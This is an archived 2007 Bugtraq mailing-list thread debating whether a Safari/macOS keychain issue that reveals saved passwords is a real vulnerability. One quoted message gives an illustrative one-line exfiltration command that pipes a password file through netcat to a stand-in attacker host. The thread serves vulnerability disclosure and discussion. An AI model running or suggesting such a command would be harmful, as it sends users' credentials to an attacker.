Open Source and information security mailing list archives
Date: Sat, 19 May 2007 01:43:23 +0200
From: poplix <poplix@...uasia.org>
To: Kevin Finisterre (lists) <kf_lists@...italmunition.com>
Cc: bugtraq@...urityfocus.com
Subject: Re: Apple Safari on MacOSX may reveal user's saved passwords

How should Safari be able to read keychain items of other apps? It
should be possible to use AppleScripts to make other apps reveal
passwords; SystemUIServer, for example, can read the WEP key, so it could
reveal it...

-p


On 18 May 2007, at 7:13 PM, Kevin Finisterre (lists) wrote:

> Make this javascript for Safari show me the saved key for another  
> application (Like a stored WEP key) and I'll be impressed.
>
> -KF
>
> On May 18, 2007, at 9:23 AM, poplix wrote:
>
>> On 17 May 2007, at 7:50 PM, graham.coles@...-logic-group.com wrote:
>>
>>> It is also why I don't leave my machine logged in and accessible  
>>> to other
>>> users, which appears to be the whole basis of this 'vulnerability'.
>>
>> This is NOT the basis of the vulnerability. The point is that
>> normally a malicious application running as a non-root user is not
>> able to read keychained passwords.
>> In this case, to steal passwords it is sufficient to entice the victim
>> to execute a malicious script; normally that is not enough, since the
>> keychain refuses access to untrusted applications.
>> This issue exposes keychained passwords as if they were saved in a
>> text file: an inexperienced user can lose his password by
>> executing an untrusted malicious shell script (i.e. "cat /home/pop/
>> pass | nc steal.com 666")
>>
>>
>>
>>>
>>> The whole concept of the keychain, however, is to restrict access  
>>> to its
>>> contents to the owner. If you can happily log in as the owner,  
>>> then you
>>> have everything they can access, INCLUDING the keychain. If they  
>>> can't do
>>> this, you just have some encrypted data. You don't HAVE to store web
>>> passwords, of course.
>>
>> The keychain asks for a password when the owner wants to see his data,
>> and having access to a computer doesn't mean that you have the
>> login password too.
>>
>>
>>> If you are sitting at the machine of a person who has left it  
>>> logged in
>>> and they use this feature, then whatever web browser you are  
>>> using will
>>> believe you are that person and provide access to the website
>>> automatically--you don't need to see the password to use it.
>>
>> And what if you gain 5 minutes' access to a laptop in the middle
>> of the desert, where an internet connection is missing . . .
>>
>>
>>>
>>> I'd like to know what Apple were supposed to do to fix this?
>>
>> I think it's sufficient to untrust the injected code....
>>
>>
>>>
>>> It is, after all, YOUR keychain with YOUR passwords that YOU want
>>> applications to recover when YOU are logged in. Why shouldn't YOU  
>>> be able
>>> to access it. If you don't want to use it don't, but if someone  
>>> has to be
>>> logged in as you to read it, that sounds about right.
>>
>> Right?? It's like having passwords saved in a text file and running
>> 'chmod 700' on it.
>>
>>
>>>
>>>>> Someone has *ROOT* access to your system REMOTELY over ssh and  
>>>>> you're
>>>>> worried that they might be able to retrieve a password from your
>>> keychain.
>>
>> Rooting a computer is really not the point; it's quite obvious that
>> "rooted comp" => "TOTAL compromise".
>>
>>
>>
>> Let me ask a question: what if Safari made the loaded password part
>> of the HTML, so it's shown when clicking "view page source"?
>> Should that be considered a vulnerability?
>>
>>
>> cheers,
>> -poplix
>>
>>>
>>>> Yes, it would be annoying if someone rooted my laptop.  It would  
>>>> be a
>>>> lot more annoying if they not only rooted my laptop but also  
>>>> cleaned out
>>>> my bank account via my browser.
>>>
>>> 'Annoying' is the understatement of the millennium.
>>>
>>> As far as root access goes, see my comments above regarding key  
>>> loggers?
>>>
>>> With root access they will have your gpg file, they will know what
>>> processes are running (they will know when you run gpg) and they can
>>> capture your keystrokes. Is this then a vulnerability of gpg? So  
>>> much for
>>> keeping your online banking safe. Even if you memorize the
>>> passwords, they
>>> can still see your keypresses and therefore empty your bank account.
>>>
>>> If someone roots your machine, security is non-existent and trust
>>> beyond
>>> repair. Don't trivialize this by comparing it to a 'might be able
>>> to see
>>> your web passwords' issue, this is disaster incarnate and game
>>> over all
>>> rolled into one!
>>
>>>
>>>> It *is* somewhat disturbing that root can so trivially interfere  
>>>> with
>>>> the guts of someone else's processes.  Normally, root has to do  
>>>> a lot of
>>>> work to do that.
>>>
>>> With great power comes great responsibility, which is precisely  
>>> why Macs
>>> have the root login disabled and require a user designated as
>>> 'Administrator' to authenticate themself whenever system files are
>>> modified or installed. Other users are created as non- 
>>> administrator and
>>> remote login is blocked by the firewall. The chances of anyone  
>>> actually
>>> logging in remotely as root on a normal Mac are zero as you, while
>>> administrator, would have to specifically enable all of this.  
>>> This is why
>>> Apple warn you not to do it.
>>>
>>>>>>  a different non-root user on the console can do it too
>>>>> Which again restricts this vulnerability (as previously
>>>>> mentioned) to
>>> an
>>>>> attacker who happens to be sitting in front of your machine(!)
>>>
>>>> Did you read the bit where I speculated about setuid applications?
>>>
>>> Yes, but again if you can get this far you either have the person's
>>> identity or root access (bad or hopeless situation respectively).  
>>> Why
>>> worry incessantly about things that you stored in the keychain being
>>> accessed when someone can access everything you own.
>>>
>>> Should the keychain refuse to divulge its contents to a person
>>> authenticated as the owner?
>>>
>>> Is the answer to remove the keychain and watch as people revert  
>>> to storing
>>> their passwords unencrypted in stickies, or text files on their  
>>> desktop?
>>>
>>> You normally have to come up with a feasible attack vector for  
>>> something
>>> to be a vulnerability, this seems far too early to be notifying the
>>> vendor.
>>>
>>> Saving passwords on any web browser is a lousy idea from a security
>>> perspective. However, people don't like security, they like  
>>> convenience.
>>> The only real fix here is perhaps a disclaimer message advising  
>>> people not
>>> to store important passwords for websites in the browser in the  
>>> first
>>> place. But let's face reality, even if they did, would it stop
>>> people doing
>>> it?
>>>
>>
>>>> --
>>>> David Cantrell
>>>
>>> --
>>> Graham Coles
>>>
>>>
>>>
>>> The Logic Group Enterprises Limited
>>> Logic House, Waterfront Business Park, Fleet Road, Fleet,  
>>> Hampshire, GU51 3SB, UK
>>> Registered in England. Registered No. 2609323
>>
